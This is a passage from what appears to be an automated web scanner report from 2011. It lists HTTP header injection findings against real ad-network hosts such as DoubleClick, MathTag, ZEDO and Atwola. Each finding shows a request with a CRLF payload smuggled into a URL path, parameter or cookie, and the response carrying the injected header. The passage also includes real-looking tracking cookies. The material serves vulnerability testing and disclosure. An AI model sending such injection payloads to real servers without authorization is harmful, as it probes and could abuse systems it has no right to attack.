Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2d7db
c78d659218b
/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 09 May 2011 15:38:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.6441.USATODAY.COM/B5327539.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12211%0d%0ad920f750be7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12211%0d%0ad920f750be7/N2883.6441.USATODAY.COM/B5327539.11;sz=300x250;pc=[TPAS_ID];click=http%3A//gannett.gcion.com/adlink%2F5111%2F798269%2F0%2F170%2FAdId%3D1587637%3BBnId%3D1%3Bitime%3D955400653%3Bkey%3Dcw27%2Bcw296%2Bcw22%2Bcw5%2Bcw461%2Bcw9%2Bcw145%3Blink%3D;ord=955400653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12211
d920f750be7
/N2883.6441.USATODAY.COM/B5327539.11;sz=300x250;pc=[TPAS_ID];click=http: //gannett.gcion.com/adlink/5111/798269/0/170/AdId=1587637;BnId=1;itime=955400653;key=cw27+cw296+cw22+cw5+cw461+cw9+cw145;link=;ord=955400653
Date: Mon, 09 May 2011 15:37:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/adj/cm.rub_usatoday/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 523df%0d%0a3531c6c3ac7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /523df%0d%0a3531c6c3ac7/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.280-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=310802;contx=weath;an=280;dc=w;btg=am.h;btg=am.b;btg=cm.ent_h;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/523df
3531c6c3ac7
/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.280-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=310802;contx=weath;an=280;dc=w;btg=am.h;btg=am.b;btg=cm.ent:
Date: Mon, 09 May 2011 15:37:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/adj/ipc-csm/globalisation_US [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ipc-csm/globalisation_US

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1a24a%0d%0ac7bc2fb3a0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1a24a%0d%0ac7bc2fb3a0/ipc-csm/globalisation_US;sz=300x250;click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%26client%3Dca-pub-6743622525202572%26adurl%3D;ord=1775429076? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1a24a
c7bc2fb3a0
/ipc-csm/globalisation_US;sz=300x250;click=http: //adclick.g.doubleclick.net/aclk
Date: Mon, 09 May 2011 15:36:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/adj/n6735.NPR/utility_search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6735.NPR/utility_search

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f36c%0d%0abfaaccb7365 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f36c%0d%0abfaaccb7365/n6735.NPR/utility_search;sz=300x250;tile=1;sc=;ord=6265119875; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f36c
bfaaccb7365
/n6735.NPR/utility_search;sz=300x250;tile=1;sc=;ord=6265119875;:
Date: Mon, 09 May 2011 15:40:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 86a12%0d%0ad65070f037d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif86a12%0d%0ad65070f037d?0.18015406071208417 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif86a12
d65070f037d
:
Date: Mon, 09 May 2011 15:35:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload b6114%0d%0a02fa660963c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304955298754?&b6114%0d%0a02fa660963c=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240052939;0-0;0;58826896;24/24;41597555/41615342/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;;b6114
02fa660963c
=1;~cs=d:
Date: Mon, 09 May 2011 15:35:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1240

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;240052939;0-0;0;58826896;24/24;41597555/41615342/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic1
...[SNIP]...

1.9. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 8b0d3%0d%0a04bcc849ea1 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=8b0d3%0d%0a04bcc849ea1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:16 GMT
Expires: Mon, 09 May 2011 15:35:16 GMT
DCLK_imp: v7;x;44306;0-0;0;58826896;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=8b0d3
04bcc849ea1
;~cs=u:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/t;44306;0-0;0;58826896;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

1.10. http://bidder.mathtag.com/iframe/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload a9839%0d%0a37a97c57239 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=a9839%0d%0a37a97c57239&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 404 Not found
Date: Mon, 09 May 2011 15:36:40 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - a9839
37a97c57239

x-mm-host: ewr-bidder-x6
Connection: keep-alive

Request not found

1.11. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload a641d%0d%0a5aa97b6dac6 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=a641d%0d%0a5aa97b6dac6&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:a641d
5aa97b6dac6
;expires=Tue, 10 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',a641d
5aa9
...[SNIP]...

1.12. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 8c360%0d%0a167f60ab8da was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AAU&si=18181&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde8c360%0d%0a167f60ab8da; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:45 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:45 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560265|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955465^1304957265|18181^1304955465^1304957265; path=/; expires=Mon, 09-May-11 16:07:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde8c360
167f60ab8da
,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

1.13. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 88780%0d%0aeb91e55787 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AAU&si=88780%0d%0aeb91e55787&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
